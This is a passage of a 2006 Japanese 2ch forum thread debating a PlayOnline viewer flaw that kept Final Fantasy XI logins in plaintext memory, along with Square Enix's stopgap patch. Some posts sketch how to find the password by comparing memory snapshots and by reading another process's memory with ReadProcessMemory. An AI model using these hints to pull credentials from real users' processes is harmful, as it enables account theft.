あるっていうのと同じレベルの話で、最初から爆発するような車ではなかったって事
つまり悪いのはツール作者とそれを使ったユーザーであってメーカーには何の落ち度も
無いって事だよ?
276既にその名前は使われています:2006/10/05(木) 20:02:51.20 ID:DFT2a3T1
win版がでた当初から言われていたIDとパスワードを暗号化せずに
メモリに保存したままというありえない脆弱性を散々放置したあげく
シナチクサイトに悪用されて実際に盗用事件もおきた。(2005/10、花の雫FF11情報局事件)
それでもなお修正せずに、デモプログラムが公開されたからネ実巡回チームが慌てただけだろ


77 名前:既にその名前は使われています[sage] 投稿日:2006/10/04(水) 18:48:37.80 ID:h2knBMfW
脆弱性を自らネ実で公開
→即時対応
→■<タスクチームの威力です
277既にその名前は使われています:2006/10/05(木) 20:47:44.35 ID:onT8uJ48
危険性を認識したままなんら対策を講じなかったというのなら、十分「落ち度」と言えるような。
POLはオプションでウィンドウ化できるから、起動したままレシピ検索などのツールを動かすことは
十分想定の範囲内だと思うんだが。
これがPOLから強制フルスクリーン化ならまだ猶予の余地はあったんだが。

なんつーかアレだ。別の事象に例えるとかえってややこしくなるってことだ。
「決められた日以外にゴミを出すと、熊に襲われる可能性があります」とかw
278既にその名前は使われています:2006/10/05(木) 20:50:13.40 ID:dPxWvdUi
変更前
char pasuwa_do[9] = {0};
strncpy(passwa_do, コントロールから文字列取る関数(), 8);

変更後
char buf[100] = {0};
char* pasuwa_do = buf + 50;
strncpy(passwa_do, コントロールから文字列取る関数(), 8);

こんな感じじゃね?ww
279既にその名前は使われています:2006/10/05(木) 21:03:06.19 ID:u1UgfHEs
どこぞのガス器具と一緒じゃねーの?不正改造すると不完全燃焼しますってやつ
改造しなきゃ何も問題は発生しないわけだがユーザーの知らないところで
勝手に改造されることもあって結局対策を取らざるを得なくなった ←イマココ

この場合、改造され易い構造にした設計者に全ての問題があるかというと
そうは言えないわけだが結果としては責任を取るべき立場にいるわけだよな
280既にその名前は使われています:2006/10/05(木) 21:10:34.62 ID:onT8uJ48
>279
正規の改良部品が間に合わなくて、不正改造をメーカーから指示されたとかで揉めてるやつか。
281既にその名前は使われています:2006/10/05(木) 21:14:13.75 ID:u1UgfHEs
たぶん違う
282既にその名前は使われています:2006/10/05(木) 21:47:43.69 ID:onT8uJ48
ありゃ、ガス器具って言うからパ□マのことかと思ったんだが、違ったか。
とまぁ、こんなふうに例え話にすると齟齬が起きやすいということだ。
283既にその名前は使われています:2006/10/05(木) 22:28:36.18 ID:NYvaTpci
価格.comとかベクターとかそんな公共の場ともいえるところにチョコンと置かれて
次から次へと知らず知らずのうちに感染していく恐れがあるのに
ユーザーが悪いってどういうこと?
284既にその名前は使われています:2006/10/05(木) 22:38:40.63 ID:YqV4ST4q
だれかが死ぬまで放置
285既にその名前は使われています:2006/10/05(木) 23:02:59.91 ID:in6QcJZl
■の脆弱性はデモプログラム作って公開しないと
ユーザーが安心して遊べなさそうでつね
286既にその名前は使われています:2006/10/05(木) 23:05:10.13 ID:NOF4sq3I
ようするに、カギの無い車を作っておいて
盗まれた時は盗んだ奴が悪いって言うことだろ
287既にその名前は使われています:2006/10/05(木) 23:07:30.59 ID:SN83lfHD
よーするに、個人情報保護シールを貼ったつもりは、付箋を貼っていたってことだろwww
288既にその名前は使われています:2006/10/05(木) 23:14:04.58 ID:nhHBRQCk
ようするに知識のない馬鹿が不正ツール引っ掛かって
パス抜かれる可能性を示唆してるんじゃない

で。
俺様が安心して不正ツール使えるようにさっさと
□eは対策しやがれと

騒ぎ立ててる連中が言ってるレベルはその低度なわけよ
289既にその名前は使われています:2006/10/05(木) 23:16:34.01 ID:UnyIMiZG
久しぶりに祭りかと思ったらもう終わってるのか・・・
290既にその名前は使われています:2006/10/05(木) 23:24:08.22 ID:LxY50TS8
291既にその名前は使われています:2006/10/06(金) 00:11:08.15 ID:RaXl1GMN
緊急バージョンアップでパスワードが無効になってアクセスできなくなる罠

■ならやってくれる
292既にその名前は使われています:2006/10/06(金) 00:24:18.57 ID:hPxjMJlv
アンケートに答えると抽選でログイン出来るようになります
293既にその名前は使われています:2006/10/06(金) 00:27:39.56 ID:0ltbxgr3
>>285
他にも中華が使っている即・寝釣りや紫→赤ネーム(あるのか?)ツールとかを
そこらじゅうの掲示板に張りまくればすぐに対応してくれるかも?
294既にその名前は使われています:2006/10/06(金) 00:36:00.95 ID:e2OUvhiS
>>290

バカ?
295既にその名前は使われています:2006/10/06(金) 00:40:59.68 ID:/Lx8+KF4
■<メモリとか見てハッキングしてるやつUZEEEEE
296既にその名前は使われています:2006/10/06(金) 03:42:42.06 ID:lNFy/S+j
パスワードが平文のまま同じアドレスにしれっと座っていた。
SEは数年前からそれを知りうる立場にあった。(開発に聞けばわかることだからね。)
だのに何も対策をとらなかった。

このたび社外の大勢の人間がそれを知ることとなった。
その後はじめて対策をとった。

一番問題はこの最後のところだと思う。今あわてて対策をとるくらいならなぜ
数年前に対策をとっておかなかったのか?
パスワードをどこに保存するかなんてのはセキュリティ対策の基本中の基本。
どうやって送信するかの次くらいに基本だ。それも知らない奴がプログラム組んでるとは
さすがに思えないんだが。

無知無能は問題だが、怠慢の方が問題だと俺は思う。

俺は個人的には平文で同じアドレスに保管するなとはいわん。それで危険性が
大幅に増加することはないというならそれでもいいとは思う。だが、ばれたら
大急ぎで「対処」するってことはそうじゃなかろう。
297既にその名前は使われています:2006/10/06(金) 05:51:15.80 ID:V+MejRae
先週辺りから急に変なメールがプレイオンラインビューアーを通して来てた(出会い系:非通知)。
X360で受信したらチェックの段階でフリーズしてたんだが、
何か関連ある?
298既にその名前は使われています:2006/10/06(金) 06:01:47.75 ID:3qnK4yZg
ツール使わない俺には関係ないぜo(`д´o)
299既にその名前は使われています:2006/10/06(金) 06:05:43.75 ID:U570POVg
FFやってない俺には関係ないぜ
300既にその名前は使われています:2006/10/06(金) 06:11:37.11 ID:3qnK4yZg
関係ないぜ
301既にその名前は使われています:2006/10/06(金) 06:25:35.20 ID:uoG8z4xG
ツール使う使わないは関係ない。
p2pソフト、ブラウザ、OS等のセキュリティホールを使ってウィルス(パス抜きプログラム)が
インストールされて、簡単にパスワードが抜かれる可能性があるってことだ。
302既にその名前は使われています:2006/10/06(金) 06:28:12.61 ID:3qnK4yZg
まじでかっw
303既にその名前は使われています:2006/10/06(金) 06:31:29.87 ID:3qnK4yZg
驚いてみたが正直何言ってるのかわかんねーぜっo(`д´o)
304既にその名前は使われています:2006/10/06(金) 06:34:34.25 ID:dvie6+qJ
確実性を考えるとFFに関するプログラムやサイトに仕込むのが一番だろうけど、
まったく無関係な、例えばデスクトップアクセサリに仕込まれる可能性だって考えられる。
305既にその名前は使われています:2006/10/06(金) 09:59:22.14 ID:xHvBcK+x
PlayOnlineの更新キターーー!!!!

・・・・・・・・・アップデート完了、っと。さて、再ログイン・・・あれ?
なにこれIDとパスワード消えてるじゃん。えっ、ま・まさか・・・


 クライアントには一切保存せず、毎回入力を促す仕様になった


ということか??なになにこれ??これが■の対応力!?馬鹿じゃん!!!!!!!!111







という夢を見た。
306既にその名前は使われています:2006/10/06(金) 10:10:19.32 ID:NZsi4p/N
>>305
キーロガー大活躍の予感だな
307既にその名前は使われています:2006/10/06(金) 10:11:17.40 ID:HslsP9z6
ま、普通に考えて>278 だろ
いま開発は必死にセキュリティの本読んでると思うよwww
308既にその名前は使われています:2006/10/06(金) 10:12:01.45 ID:/BIKFwWk
■eさん給料下さい
309既にその名前は使われています:2006/10/06(金) 10:14:23.53 ID:lNFy/S+j
>>278はいくらなんでもヒドスwwwwww
なんにも解決になってねえ・・・w
310既にその名前は使われています:2006/10/06(金) 10:23:41.91 ID:SDUbS7Ps
>>278の情報を拾ってくることが、スペシャルタスクチームの最初の仕事だったりしてな。
311既にその名前は使われています:2006/10/06(金) 10:24:02.09 ID:0YQk2BFT
■e ttp://www.playonline.com/home/polnews/news8674.shtml
2006年10月6日(金)にプレイオンラインビューアーの緊急更新を実施いたします。
これにより、上記の不具合による危険性は回避されます。

ウインドウ名変えるだけじゃね?
アドレスずらすだけじゃね?
ビット反転するだけじゃね?

■e (;^ω^)…
なお、この更新作業は暫定的な対処であり、
本格的な対策は近日中に実施いたします。
312既にその名前は使われています:2006/10/06(金) 10:24:53.21 ID:xHvBcK+x
>>309
過去の実績

■ < 窓化潰しました!
● < ウィンドウタイトルがFFXIから、なんか違う文字列になってるww
● < ウィンドウタイトルをユーザーが指定できるようにしますた

■ < 今度こそ窓化、完璧に潰しました!!!
● < ウィンドウタイトルが一定時間ごとにころころ変わるようになってるwwwww
● < ウィンドウタイトル書き換えをフックしますた

■ < もう、対応策見つからないぽ・・・
313既にその名前は使われています:2006/10/06(金) 10:28:48.66 ID:0YQk2BFT
POL更新されたらパスワード0000000000000000とかにして
メモリイメージ採って、1111111111111111とかにして
比較すればすぐ見つかりそうだな、暫定とかだと。
314既にその名前は使われています:2006/10/06(金) 10:37:33.73 ID:f+cGRI4l
個人的にはグローバル変数としてもたないで
ヒープ領域に置くだけな気がする。
315既にその名前は使われています:2006/10/06(金) 10:38:24.03 ID:tqxHWo58
>>297
POLに変なメール来たことはないわ。
同調するものも無しってことはお前自身が何かやらかしてんじゃね?
316既にその名前は使われています:2006/10/06(金) 10:59:52.90 ID:vA2dDq8c
>>305
全米がゾッとした
317既にその名前は使われています:2006/10/06(金) 11:02:45.46 ID:7dSah94M
http://news20.2ch.net/test/read.cgi/news/1160096043/

POLのパスワードぶっこ抜きどころじゃないわけだが。
318既にその名前は使われています:2006/10/06(金) 11:10:26.56 ID:lNFy/S+j
まあ抜けてるとはいえ被害者ではあるからご愁傷様だが、POLのパスワード
ぶっこ抜きはやると金が儲かるかもしれんわけで、金が絡むと本気になる奴は
ほんっとに本気になるから、FFのパスワード抜ける方が世間に与える影響は
でかい気はする。
319既にその名前は使われています:2006/10/06(金) 11:15:01.13 ID:OiL4yEQ8
320既にその名前は使われています:2006/10/06(金) 13:14:44.55 ID:dvie6+qJ
静かだなオイ
ケツ毛バーガーの威力凄過ぎw
321既にその名前は使われています:2006/10/06(金) 15:18:44.00 ID:AtgxwfqQ
俺たちゃタスクチーム!
322既にその名前は使われています:2006/10/06(金) 15:50:50.65 ID:xHvBcK+x
>>319
>スクウェア・エニックス、「プレイオンライン」に
>IDとパスワードを盗用できる不具合を確認

インプレスはよく理解しているね。
うん、■は「確認」しただけだ。



発見したのではない。
323既にその名前は使われています:2006/10/06(金) 16:41:34.04 ID:0YQk2BFT
自社で見つけたら(公になっていないのなら)
何かのついでにこっそり直すしな。
324既にその名前は使われています:2006/10/06(金) 17:10:01.61 ID:xHvBcK+x
そして不具合も追加される。
325既にその名前は使われています:2006/10/06(金) 17:11:39.70 ID:aWEMHQr2
これ、パスがヒープにおいてあったら(=malloc)見えたのかな?
Win32 API眺めてたらGetProcessHeapっていう次プロセスのヒープにアクセス
するためのAPIはあったが、他プロセスのヒープを覗くAPIは見あたらなかった。
デバッガを作るのには必要だろうから、あるとは思うのだが。
326既にその名前は使われています:2006/10/06(金) 17:14:35.03 ID:PP35mBuv
そりゃ見えるさ。
ポインタ拾う分ステップ増えるけど。
327既にその名前は使われています:2006/10/06(金) 17:32:55.64 ID:aWEMHQr2
ああ、ReadProcessMemoryを使う時点でそのプロセスのアドレス空間
読みまくりだから、直接他プロセスのヒープハンドルを扱わずともいい
わけか。
328既にその名前は使われています:2006/10/06(金) 18:07:19.91 ID:KBxaz5/B
今システムメッセ出た。
18時30分頃POLバージョンアップ。
329既にその名前は使われています:2006/10/06(金) 18:36:13.68 ID:lxufWzwf
ハイハイ解析解析
330既にその名前は使われています:2006/10/06(金) 18:39:51.16 ID:CloLKILs
あんまり伸びねぇな
どっちかっていうと儲だけどシャドウベイン級の祭りが起こるのをいつも心待ちにしてるのにw
331既にその名前は使われています:2006/10/06(金) 18:42:05.64 ID:7+/zpjZv
プレイオンラインビューアー更新のお知らせ(10/6)
http://www.playonline.com/ff11/polnews/news8735.shtml

日 時:2006年10月6日(金) 18:30頃

対 象:プレイオンラインビューアーをご利用のお客様

【主な変更内容】

■不正なプログラムによる情報の漏洩への暫定的な対策を施しまし
 た。
 ※本格的な対策は近日中の実施を予定しております。
332既にその名前は使われています:2006/10/06(金) 18:58:18.91 ID:a8aCMcgu
1.17.02h→1.17.02j
333既にその名前は使われています:2006/10/06(金) 19:17:39.31 ID:xHvBcK+x
>>325
プロセス関連は当然存在する
なければ、そもそもメモリエディタなんてつくれんだろ?
334既にその名前は使われています:2006/10/06(金) 20:55:17.65 ID:AY1M8min
スクウェア・エニックス、「プレイオンライン」で脆弱性を確認。アップデートで暫定対応を完了。被害報告は0件
http://www.watch.impress.co.jp/game/docs/20061006/pol.htm
335既にその名前は使われています:2006/10/06(金) 21:08:03.11 ID:3em4Bg/N
もうパス見れなくなったん?
336既にその名前は使われています:2006/10/06(金) 22:03:02.71 ID:mDnR7YE0
>335
技術チーム(ネ実等)が懸命の検証作業中。
337既にその名前は使われています:2006/10/07(土) 00:35:32.88 ID:qDFEdvkU
                 l..:.::::::::::::::::::::::::::::イ      =     =
                    |.:::::::::::::::::::::::::::::: |     ニ= ■ そ -=
                  |:r¬‐--─勹:::::|     ニ=  e れ =ニ
                 |:} __ 、._ `}f'〉n_   =- な. で -=
  、、 l | /, ,         ,ヘ}´`'`` `´` |ノ:::|.|  ヽ ニ .ら. も ニ
 .ヽ     ´´,      ,ゝ|、   、,    l|ヽ:ヽヽ  } ´r :   ヽ`
.ヽ  や き ■ ニ.    /|{/ :ヽ -=- ./| |.|:::::| |  |  ´/小ヽ`
=  ら .っ e  =ニ /:.:.::ヽ、  \二/ :| |.|:::::| |  /
ニ く か と. な  -= ヽ、:.:::::::ヽ、._、  _,ノ/.:::::| | /|
= れ し 何 ら  -=   ヽ、:::::::::\、__/::.z先.:| |' :|
ニ るて か   =ニ   | |:::::::::::::::::::::::::::::::::::.|'夂.:Y′ト、
/, :       ヽ、    | |::::::::::::::::::::::::::::::::::::_土_::|  '゙, .\
 /     ヽ、
338サポシ ◆b7EvvsUjsA :2006/10/07(土) 03:28:25.18 ID:chkUjHr0
スクエにってツール使うやつにバツと思って残してたんじゃね
339既にその名前は使われています:2006/10/07(土) 08:00:55.65 ID:yrJc5Eu/
340既にその名前は使われています:2006/10/07(土) 11:04:25.29 ID:9NNIKiHo
ちょwwwwwwww
前後入れ替えただけwwwwwwwwww
341既にその名前は使われています:2006/10/07(土) 11:23:19.68 ID:UaZRWzZb
>>340
kwsk
342既にその名前は使われています:2006/10/07(土) 11:44:44.13 ID:rHSpsBTq
うは、■eが先にみつけて対策したのかと思ったw
343既にその名前は使われています:2006/10/07(土) 11:47:03.37 ID:oBmyaXXm
最強装備がエラント胴で、全所持金8万しかないから、怖くない。
344既にその名前は使われています:2006/10/07(土) 11:50:05.21 ID:oBmyaXXm
ありえねぇ。平文かよ。
暗号化も何にもしてないって、ありえねぇ。
うちの会社の糞サイトだってログイン部分は普通にSSL通信なのに・・・・・・・・・・・

これ、抜かれて訴えられたら、1000%スクエニが負けるぞ。
よく放置してるなw
345既にその名前は使われています:2006/10/07(土) 12:21:47.57 ID:t6UkFsJr
>>344
ユーザーは訴える見込み。のニュースが流れた時点で対策を施すことを発表するw
346既にその名前は使われています:2006/10/07(土) 12:31:13.75 ID:ei3ntR4G
応急処置ですからね。
暗号化などの改良はもう少し後でしょう。

応急処置に対応した抜き出しプログラムが公開されたら
暗号化が早まるかもしれません。
347既にその名前は使われています:2006/10/07(土) 15:33:56.84 ID:7wkqe/dA
■e<暗号化しました。
りゅうていみやおうほりさんとりさんぺぺぺぺぺ+平文
348既にその名前は使われています:2006/10/07(土) 15:38:02.54 ID:XDbu9NP/
>>343
そこまでレベル上げた時間が無駄になるんだ
349既にその名前は使われています:2006/10/07(土) 20:14:04.79 ID:x9dl2u80
a
350既にその名前は使われています:2006/10/08(日) 00:42:33.17 ID:Gq1ZZjgg
pokotan
351既にその名前は使われています:2006/10/08(日) 01:03:48.50 ID:9hC1H/lD
in
352既にその名前は使われています:2006/10/08(日) 01:09:58.18 ID:V3RCAt6+
shita
353既にその名前は使われています:2006/10/08(日) 01:21:36.27 ID:CCwBoDLl
YO
354既にその名前は使われています:2006/10/08(日) 01:25:58.99 ID:ChWc5w7J
POLに接続できないんだが(認証中からすすまない)
ここの被害者ってことになるん?
355既にその名前は使われています
いいえ。